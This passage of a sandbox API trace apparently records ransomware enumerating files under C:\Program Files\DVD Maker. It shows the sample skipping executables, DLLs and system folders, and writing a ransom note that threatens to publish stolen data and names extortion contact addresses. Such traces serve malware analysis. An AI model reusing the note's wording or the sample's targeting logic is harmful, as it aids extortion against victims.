(in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0137.461] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.461] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2b30 | out: hHeap=0xea0000) returned 1 [0137.461] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0137.461] Sleep (dwMilliseconds=0x32) [0137.514] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.514] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc00 | out: hHeap=0xea0000) returned 1 [0137.514] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0137.514] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.514] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0137.514] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.514] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.514] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2b30 [0137.514] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.514] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebbe8 [0137.514] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xed3498 [0137.514] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebbe8 | out: hHeap=0xea0000) returned 1 [0137.515] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.515] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2b30 | out: hHeap=0xea0000) returned 1 [0137.515] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\R3ADM3.txt" (normalized: "c:\\program files\\dvd maker\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0137.515] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0137.515] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0137.517] CloseHandle (hObject=0x6c4) returned 1 [0137.517] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.517] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.517] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x57ae2850, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57ae2850, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0137.518] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0137.518] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x57ae2850, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57ae2850, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.518] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0137.518] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0137.518] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ed7565, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0ed7565, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0efd6c5, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="audiodepthconverter.ax", cAlternateFileName="")) returned 1 [0137.518] lstrcmpW (lpString1="audiodepthconverter.ax", lpString2=".") returned 1 [0137.518] lstrcmpW (lpString1="audiodepthconverter.ax", lpString2="..") returned 1 [0137.518] StrStrIW (lpFirst="audiodepthconverter.ax", lpSrch=".UAKXC") returned 0x0 [0137.518] StrStrIW (lpFirst="audiodepthconverter.ax", lpSrch=".exe") returned 0x0 [0137.518] StrStrIW (lpFirst="audiodepthconverter.ax", lpSrch=".dll") returned 0x0 [0137.518] StrStrIW (lpFirst="audiodepthconverter.ax", lpSrch=".lnk") returned 0x0 [0137.518] StrStrIW (lpFirst="audiodepthconverter.ax", lpSrch=".sys") returned 0x0 [0137.518] StrStrIW (lpFirst="audiodepthconverter.ax", lpSrch=".msi") returned 0x0 [0137.518] StrStrIW (lpFirst="audiodepthconverter.ax", lpSrch="R3ADM3.txt") returned 0x0 [0137.518] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.518] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.518] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.518] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xedab30 [0137.518] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.518] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.518] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.518] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee398 [0137.518] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2b30 [0137.518] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee410 [0137.519] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee398 | out: hHeap=0xea0000) returned 1 [0137.519] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0137.519] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499cc441, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x499cc441, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1303c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bod_r.TTF", cAlternateFileName="")) returned 1 [0137.519] lstrcmpW (lpString1="bod_r.TTF", lpString2=".") returned 1 [0137.519] lstrcmpW (lpString1="bod_r.TTF", lpString2="..") returned 1 [0137.519] StrStrIW (lpFirst="bod_r.TTF", lpSrch=".UAKXC") returned 0x0 [0137.519] StrStrIW (lpFirst="bod_r.TTF", lpSrch=".exe") returned 0x0 [0137.519] StrStrIW (lpFirst="bod_r.TTF", lpSrch=".dll") returned 0x0 [0137.519] StrStrIW (lpFirst="bod_r.TTF", lpSrch=".lnk") returned 0x0 [0137.519] StrStrIW (lpFirst="bod_r.TTF", lpSrch=".sys") returned 0x0 [0137.519] StrStrIW (lpFirst="bod_r.TTF", lpSrch=".msi") returned 0x0 [0137.519] StrStrIW (lpFirst="bod_r.TTF", lpSrch="R3ADM3.txt") returned 0x0 [0137.519] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3058 [0137.519] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.519] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.519] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xed3498 [0137.519] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.519] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.519] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3058 | out: hHeap=0xea0000) returned 1 [0137.519] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2bb0 [0137.519] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3058 [0137.519] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0137.519] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2bb0 | out: hHeap=0xea0000) returned 1 [0137.519] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.519] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0eb1404, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0eb1404, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0ed7565, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="directshowtap.ax", cAlternateFileName="")) returned 1 [0137.519] lstrcmpW (lpString1="directshowtap.ax", lpString2=".") returned 1 [0137.520] lstrcmpW (lpString1="directshowtap.ax", lpString2="..") returned 1 [0137.520] StrStrIW (lpFirst="directshowtap.ax", lpSrch=".UAKXC") returned 0x0 [0137.520] StrStrIW (lpFirst="directshowtap.ax", lpSrch=".exe") returned 0x0 [0137.520] StrStrIW (lpFirst="directshowtap.ax", lpSrch=".dll") returned 0x0 [0137.520] StrStrIW (lpFirst="directshowtap.ax", lpSrch=".lnk") returned 0x0 [0137.520] StrStrIW (lpFirst="directshowtap.ax", lpSrch=".sys") returned 0x0 [0137.520] StrStrIW (lpFirst="directshowtap.ax", lpSrch=".msi") returned 0x0 [0137.520] StrStrIW (lpFirst="directshowtap.ax", lpSrch="R3ADM3.txt") returned 0x0 [0137.520] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.520] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.520] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.520] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.520] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.520] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.520] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.520] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeee398 [0137.520] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc70 [0137.520] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xedab30 [0137.520] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee398 | out: hHeap=0xea0000) returned 1 [0137.520] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.520] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9ae6642, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xc9ae6642, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0xe1601f60, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x227600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DVDMaker.exe", cAlternateFileName="")) returned 1 [0137.520] lstrcmpW (lpString1="DVDMaker.exe", lpString2=".") returned 1 [0137.520] lstrcmpW (lpString1="DVDMaker.exe", lpString2="..") returned 1 [0137.520] StrStrIW (lpFirst="DVDMaker.exe", lpSrch=".UAKXC") returned 0x0 [0137.520] StrStrIW (lpFirst="DVDMaker.exe", lpSrch=".exe") returned=".exe" [0137.520] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xaa276ca7, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f05f082, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0137.520] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0137.520] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0137.521] StrStrIW (lpFirst="en-US", lpSrch="tmp") returned 0x0 [0137.521] StrStrIW (lpFirst="en-US", lpSrch="winnt") returned 0x0 [0137.521] StrStrIW (lpFirst="en-US", lpSrch="temp") returned 0x0 [0137.521] StrStrIW (lpFirst="en-US", lpSrch="thumb") returned 0x0 [0137.521] StrStrIW (lpFirst="en-US", lpSrch="$Recycle.Bin") returned 0x0 [0137.521] StrStrIW (lpFirst="en-US", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.521] StrStrIW (lpFirst="en-US", lpSrch="System Volume Information") returned 0x0 [0137.521] StrStrIW (lpFirst="en-US", lpSrch="Boot") returned 0x0 [0137.521] StrStrIW (lpFirst="en-US", lpSrch="Windows") returned 0x0 [0137.521] StrStrIW (lpFirst="en-US", lpSrch="Trend Micro") returned 0x0 [0137.521] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.521] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.521] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xed3498 [0137.521] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.521] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.521] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc98 [0137.521] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2bb0 [0137.521] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.521] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd559b52d, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xd559b52d, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xddb8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Eurosti.TTF", cAlternateFileName="")) returned 1 [0137.521] lstrcmpW (lpString1="Eurosti.TTF", lpString2=".") returned 1 [0137.521] lstrcmpW (lpString1="Eurosti.TTF", lpString2="..") returned 1 [0137.521] StrStrIW (lpFirst="Eurosti.TTF", lpSrch=".UAKXC") returned 0x0 [0137.521] StrStrIW (lpFirst="Eurosti.TTF", lpSrch=".exe") returned 0x0 [0137.521] StrStrIW (lpFirst="Eurosti.TTF", lpSrch=".dll") returned 0x0 [0137.521] StrStrIW (lpFirst="Eurosti.TTF", lpSrch=".lnk") returned 0x0 [0137.521] StrStrIW (lpFirst="Eurosti.TTF", lpSrch=".sys") returned 0x0 [0137.521] StrStrIW (lpFirst="Eurosti.TTF", lpSrch=".msi") returned 0x0 [0137.521] StrStrIW (lpFirst="Eurosti.TTF", lpSrch="R3ADM3.txt") returned 0x0 [0137.521] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeccc0 [0137.522] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.522] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.522] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xed3498 [0137.522] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.522] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.522] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeccc0 | out: hHeap=0xea0000) returned 1 [0137.522] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3080 [0137.522] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeccc0 [0137.522] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2cb8 [0137.522] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3080 | out: hHeap=0xea0000) returned 1 [0137.522] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.522] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fieldswitch.ax", cAlternateFileName="")) returned 1 [0137.522] lstrcmpW (lpString1="fieldswitch.ax", lpString2=".") returned 1 [0137.522] lstrcmpW (lpString1="fieldswitch.ax", lpString2="..") returned 1 [0137.522] StrStrIW (lpFirst="fieldswitch.ax", lpSrch=".UAKXC") returned 0x0 [0137.522] StrStrIW (lpFirst="fieldswitch.ax", lpSrch=".exe") returned 0x0 [0137.522] StrStrIW (lpFirst="fieldswitch.ax", lpSrch=".dll") returned 0x0 [0137.522] StrStrIW (lpFirst="fieldswitch.ax", lpSrch=".lnk") returned 0x0 [0137.522] StrStrIW (lpFirst="fieldswitch.ax", lpSrch=".sys") returned 0x0 [0137.522] StrStrIW (lpFirst="fieldswitch.ax", lpSrch=".msi") returned 0x0 [0137.522] StrStrIW (lpFirst="fieldswitch.ax", lpSrch="R3ADM3.txt") returned 0x0 [0137.522] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecce8 [0137.522] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.522] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.523] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.523] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.523] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.523] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecce8 | out: hHeap=0xea0000) returned 1 [0137.523] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeee398 [0137.523] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecce8 [0137.523] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeee488 [0137.523] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee398 | out: hHeap=0xea0000) returned 1 [0137.523] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.523] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bdd9df, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bdd9df, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="offset.ax", cAlternateFileName="")) returned 1 [0137.523] lstrcmpW (lpString1="offset.ax", lpString2=".") returned 1 [0137.523] lstrcmpW (lpString1="offset.ax", lpString2="..") returned 1 [0137.523] StrStrIW (lpFirst="offset.ax", lpSrch=".UAKXC") returned 0x0 [0137.523] StrStrIW (lpFirst="offset.ax", lpSrch=".exe") returned 0x0 [0137.523] StrStrIW (lpFirst="offset.ax", lpSrch=".dll") returned 0x0 [0137.523] StrStrIW (lpFirst="offset.ax", lpSrch=".lnk") returned 0x0 [0137.523] StrStrIW (lpFirst="offset.ax", lpSrch=".sys") returned 0x0 [0137.523] StrStrIW (lpFirst="offset.ax", lpSrch=".msi") returned 0x0 [0137.523] StrStrIW (lpFirst="offset.ax", lpSrch="R3ADM3.txt") returned 0x0 [0137.523] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd10 [0137.523] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.523] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.524] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xed3498 [0137.524] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.524] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.524] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd10 | out: hHeap=0xea0000) returned 1 [0137.524] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3080 [0137.524] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd10 [0137.524] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2dc0 [0137.524] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3080 | out: hHeap=0xea0000) returned 1 [0137.524] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.524] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0eb1404, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe46400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OmdBase.dll", cAlternateFileName="")) returned 1 [0137.524] lstrcmpW (lpString1="OmdBase.dll", lpString2=".") returned 1 [0137.524] lstrcmpW (lpString1="OmdBase.dll", lpString2="..") returned 1 [0137.524] StrStrIW (lpFirst="OmdBase.dll", lpSrch=".UAKXC") returned 0x0 [0137.524] StrStrIW (lpFirst="OmdBase.dll", lpSrch=".exe") returned 0x0 [0137.524] StrStrIW (lpFirst="OmdBase.dll", lpSrch=".dll") returned=".dll" [0137.524] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0efd6c5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0efd6c5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb102e1c7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x432600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OmdProject.dll", cAlternateFileName="")) returned 1 [0137.524] lstrcmpW (lpString1="OmdProject.dll", lpString2=".") returned 1 [0137.524] lstrcmpW (lpString1="OmdProject.dll", lpString2="..") returned 1 [0137.524] StrStrIW (lpFirst="OmdProject.dll", lpSrch=".UAKXC") returned 0x0 [0137.524] StrStrIW (lpFirst="OmdProject.dll", lpSrch=".exe") returned 0x0 [0137.524] StrStrIW (lpFirst="OmdProject.dll", lpSrch=".dll") returned=".dll" [0137.524] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0b6b5be, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0b6b5be, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bb787f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1c4600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pipeline.dll", cAlternateFileName="")) returned 1 [0137.524] lstrcmpW (lpString1="Pipeline.dll", lpString2=".") returned 1 [0137.524] lstrcmpW (lpString1="Pipeline.dll", lpString2="..") returned 1 [0137.524] StrStrIW (lpFirst="Pipeline.dll", lpSrch=".UAKXC") returned 0x0 [0137.524] StrStrIW (lpFirst="Pipeline.dll", lpSrch=".exe") returned 0x0 [0137.524] StrStrIW (lpFirst="Pipeline.dll", lpSrch=".dll") returned=".dll" [0137.524] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7b5c53e, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xc7b5c53e, 